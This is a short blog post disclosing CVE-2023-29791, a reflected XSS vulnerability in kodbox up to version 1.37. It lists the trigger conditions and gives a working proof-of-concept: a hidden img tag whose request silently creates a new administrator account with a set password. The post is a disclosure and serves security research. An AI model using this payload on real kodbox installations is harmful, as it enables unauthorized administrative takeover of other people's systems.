CVE-2023-29791: kodbox xss - JunBlog
kodbox <= 1.37 is vulnerable to Cross Site Scripting (XSS) via the debug information.
English version
0x01 Vulnerability Description
Reflective xss vulnerability caused by debug information
0x02 Affected version
0x03 Vulnerability recurrence
Triggering conditions
- Turn off csrf protection
- Administrator privileges
Turn off csrf protection steps
Desktop->System settings->Basic->Security->Enable csrf protection (OFF)
Then construct the link to trigger xss
Here construct a poc to add an administrator, because csrf is closed, here directly send a get request to add an administrator through the img tag, the added account is testu and the password is testuser
<img src="/?API_ROUTE=admin/member/add%26name=testuser%26nickName=testu%26password=testuser%26addMore=base%26roleID=3%26groupInfo=%7B%221%22%3A%221%22%7D%26sizeMax=0%26sizeUse=0" style='display:none'>
full link, visit
Successfully created an admin user
- 本文作者:Juneha
- 本文链接:https://blog.mo60.cn/index.php/archives/kodbox-xss.html
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